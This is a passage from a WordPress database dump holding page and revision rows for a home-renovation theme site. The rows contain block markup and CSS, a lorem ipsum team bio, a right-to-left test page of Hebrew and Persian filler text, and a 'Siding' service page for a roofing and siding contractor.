style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-instagram\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Our Team','','inherit','closed','closed','','170-revision-v1','','','2021-05-27 05:17:13','2021-05-27 05:17:13','',170,'https://cteisys.com/?p=342',0,'revision','',0),(191,1,'2021-05-27 05:34:59','2021-05-27 05:34:59','<!-- wp:html -->\n<div dir=\"rtl\"><p>מדעי נבחרים גם עוד, כלכלה חבריכם מדע על. כלל על ברוכים אנגלית הקנאים. אם לחבר ריקוד אחר, של שמו לעברית לרפובליקה. וקשקש מדריכים או לוח, על לוח הבהרה לאחרונה ויקיפדיה. המשפט זכויות מיוחדים אל צעד, או לחבר רשימות בהיסטוריה מלא.</p><p>גם ויש שנתי ביוטכנולוגיה, זאת על רוסית המחשב, הבהרה קודמות תאולוגיה של אחד. אחר אל ניהול המלצת, בה לשון עמוד שמו, לחבר בדפים התפתחות בה קרן. המקובל לעריכת את סדר, תנך אל בדפים המדינה. או סדר רשימות שימושיים, חינוך הסביבה צ’ט דת, עזה גם לכאן הבאים.</p><p>הבקשה ביוני גם שתי, רוסית צרפתית אדריכלות או צ’ט. ליום שמות מוסיקה על בדף, גם מדע אינו ספורט באגים. בדף כדור בארגז הסביבה או, רבה בכפוף החופשית אדריכלות גם. חשמל טיפול גם מתן, זקוק תרבות אדריכלות שתי או.</p><p>لورم ایپسوم متن ساختگی با تولید سادگی نامفهوم از صنعت چاپ و با استفاده از طراحان گرافیک است. چاپگرها و متون بلکه روزنامه و مجله در ستون و سطرآنچنان که لازم است و برای شرایط فعلی تکنولوژی مورد نیاز و کاربردهای متنوع با هدف بهبود ابزارهای کاربردی می باشد. کتابهای زیادی در شصت و سه درصد گذشته، حال و آینده شناخت فراوان جامعه و متخصصان را می طلبد تا با نرم افزارها شناخت بیشتری را برای طراحان رایانه ای علی الخصوص طراحان خلاقی و فرهنگ پیشرو در زبان فارسی ایجاد کرد. در این صورت می توان امید داشت که تمام و دشواری موجود در ارائه راهکارها و شرایط سخت تایپ به پایان رسد وزمان مورد نیاز شامل حروفچینی دستاوردهای اصلی و جوابگوی سوالات پیوسته اهل دنیای موجود طراحی اساسا مورد استفاده قرار گیرد.</p></div>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','RTL Tested','','publish','closed','closed','','rtl-tested','','','2021-05-27 05:34:59','2021-05-27 05:34:59','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=191',0,'page','',0),(215,1,'2021-05-27 06:57:20','2021-05-27 06:57:20','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30125cb2-5b1a-4355-96e3-c2a9ea89f965\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"afa0e568-68f4-4025-b8bc-c877ecbbb129\"} -->\n<style type=\"text/css\"> .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-afa0e568-68f4-4025-b8bc-c877ecbbb129 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-afa0e568-68f4-4025-b8bc-c877ecbbb129 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"6a05bb6a-276d-4790-b47d-858d6f80f6d3\"} -->\n<style type=\"text/css\"> .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a05bb6a-276d-4790-b47d-858d6f80f6d3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6a05bb6a-276d-4790-b47d-858d6f80f6d3\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"49f6ee6c-504d-4d60-938f-35ad6223261c\"} -->\n<style type=\"text/css\"> .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-49f6ee6c-504d-4d60-938f-35ad6223261c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-49f6ee6c-504d-4d60-938f-35ad6223261c\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2f8e1399-a394-4dc5-afcc-503ec3adb6af\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2f8e1399-a394-4dc5-afcc-503ec3adb6af {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2f8e1399-a394-4dc5-afcc-503ec3adb6af\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Dunrite Roof And siding</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>Few things add curb appeal better than new, clean siding. With so many siding contractors out there to choose from getting started on your project can be a little overwhelming, so let us help!<br><br>Good siding contractors will be able to help you pick the right kind of siding for your home based on budget, climate, design and more! This will make sure that you get the most out of your new or renovated siding.<br><br>Just a note: when going with a new siding contractor be sure they have adequate liability insurance. Anyone with a truck and a ladder can claim to be a siding contractor, so there are plenty of uninsured one-man operations out there. You can never be too careful for a siding installation job that will require the siding contractors to climb on your roof!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1715a7e2-d9ed-427a-be77-136e8c2c931b\"} -->\n<style type=\"text/css\"> .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1715a7e2-d9ed-427a-be77-136e8c2c931b .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1715a7e2-d9ed-427a-be77-136e8c2c931b skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"efa13df2-51dc-4c44-938f-814450f36d07\"} -->\n<style type=\"text/css\"> .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-efa13df2-51dc-4c44-938f-814450f36d07 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-efa13df2-51dc-4c44-938f-814450f36d07\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"49885c91-6f61-4ac3-8911-3a58424dd7c7\"} -->\n<style type=\"text/css\"> .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-49885c91-6f61-4ac3-8911-3a58424dd7c7 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/248413504_4961941493820252_6022205579321516239_n.jpg\" alt=\"\" data-id=\"411\" data-link=\"https://cteisys.com/248413504_4961941493820252_6022205579321516239_n/\" class=\"wp-image-411\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" data-id=\"413\" data-link=\"https://cteisys.com/c60adea113fb2f5f80419bb170309509/\" class=\"wp-image-413\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" data-id=\"414\" data-link=\"https://cteisys.com/dsc03903-1/\" class=\"wp-image-414\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form <a href=\"https://cteisys.com/contact-layout-1/\">here.</a> We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Siding','','publish','closed','closed','','roofing','','','2022-08-23 18:50:34','2022-08-23 18:50:34','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=215',0,'page','',0),(456,1,'2022-08-23 18:50:34','2022-08-23 18:50:34','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30125cb2-5b1a-4355-96e3-c2a9ea89f965\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-30125cb2-5b1a-4355-96e3-c2a9ea89f965.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n 